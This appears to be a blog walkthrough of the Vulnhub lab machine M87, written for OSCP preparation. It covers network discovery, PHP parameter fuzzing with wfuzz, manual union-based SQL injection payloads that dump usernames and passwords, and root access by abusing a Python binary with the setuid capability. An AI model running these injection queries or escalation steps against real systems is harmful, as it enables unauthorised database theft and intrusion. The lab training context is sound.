Preparing for the OSCP exam means you need to know the basics, but you also need the experience. There is perhaps no better way to test how prepared you are for the exam than by hacking web apps. In this walkthrough, we will cover one important skill to master, SQL injection without Metasploit. The M87 Vulnhub walkthrough will teach you how to do this so that you can feel confident in taking the exam no matter what is on the test.
I show you how to do ethical hacking in a realistic lab environment in Become An Ethical Hacker, check the price on Amazon.
Table of Contents
What Is SQL Injection?
SQL Injection is a code injection technique used by hackers to affect the database that is running behind the web application in order to expose or manipulate data that should otherwise not be accessible.
How To Do SQL Injection?
The best way to do SQL injection on the M87 box is to:
- Fuzz for available PHP parameters.
- Test for SQL Injection vulnerability by supplying the parameter with various inputs.
Initial Enumeration
The first step of a penetration test is to check which nodes are active on the network. Often times a Vulnhub machine will not display its ip address which means you must find it. One such way is to use fping, a native binary on Kali Linux machines.
fping -ga x.x.x.0/24 2> /dev/null Right away we see that the box has some web ports open which means this will likely be a web app exploit box as the initial exploit vector.
How to Fuzz PHP Parameters
An important ethical hacking skill for hacking web apps that I don’t find the OSCP material covers well enough in the slightest is fuzzing PHP parameters. This is a great example of how ethical hacking itself is an art form and a science. The tool of choice for me is wfuzz.
wfuzz --hw 161 -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.1.162/admin/backup/?FUZZ=We see that there is a PHP paramter, “id”.
SQL Injection Without SQLMap
The OSCP exam does not allow the use of auto exploitation tools such as SQLMap (boo) but don’t be afraid the idea of being OSCP-certified is to know enough to be dangerous, but not be an expert. Although an expert is technically anyone who knows more than most about a particular subject.
- Add a single quote to id=1′ to test if SQL injection is possible.
- If so then next we need to find out the name of the database.
- We need to enumerate the columns of the tables of the database in order to find credentials as this is likely the intended design of the box.
With that said one of the first tests I perform is to check if the id parameter is vulnerable to SQL injection.
Now that we know the name of the database we can get the the name of the other columns by sequentially changing the limit parameter to 2,1 then 3,1 and so forth.
http://192.168.1.162/admin/backup/index.php?id=16 or 1=2 union select (select column_name from information_schema.columns where table_schema='db' and table_name='users' limit 1,1)Now to dump the database. This is as simple as moving through the limit again starting with 1,1 and going to 2,1 and so on.
index.php?id=99 or 1=2 union select (select concat(id," ",email," ",username," ",password) from users limit 0,1)By manipulating the column line and row we can extract the credentials that are stored in the database.
index.php?id=99 or 1=2 union select (select concat(id," ",email," ",username," ",password) from users limit 8,1)The final query dumps the last line in the table, we will use this password to login to the web app. This brings up the important technique of trying credentials on your list of captured usernames in order to login.
M87 Vulnhub Linux Privilege Escalation
A simple enumeration for Linux privilege escalation finds that the charlotte user can . The getcap tool can be used to look up the capabilities embedded in an executable. It turns out this /usr/bin/old file is the Python binary. We see the user is assigned the cap_setuid+ep permission which means all privilege is assigned to the user for the program. We do anything then! This includes abusing the feature to escalate privileges to root.
That’s it for the M87 Vulnhub box, we are now root and can claim the flag.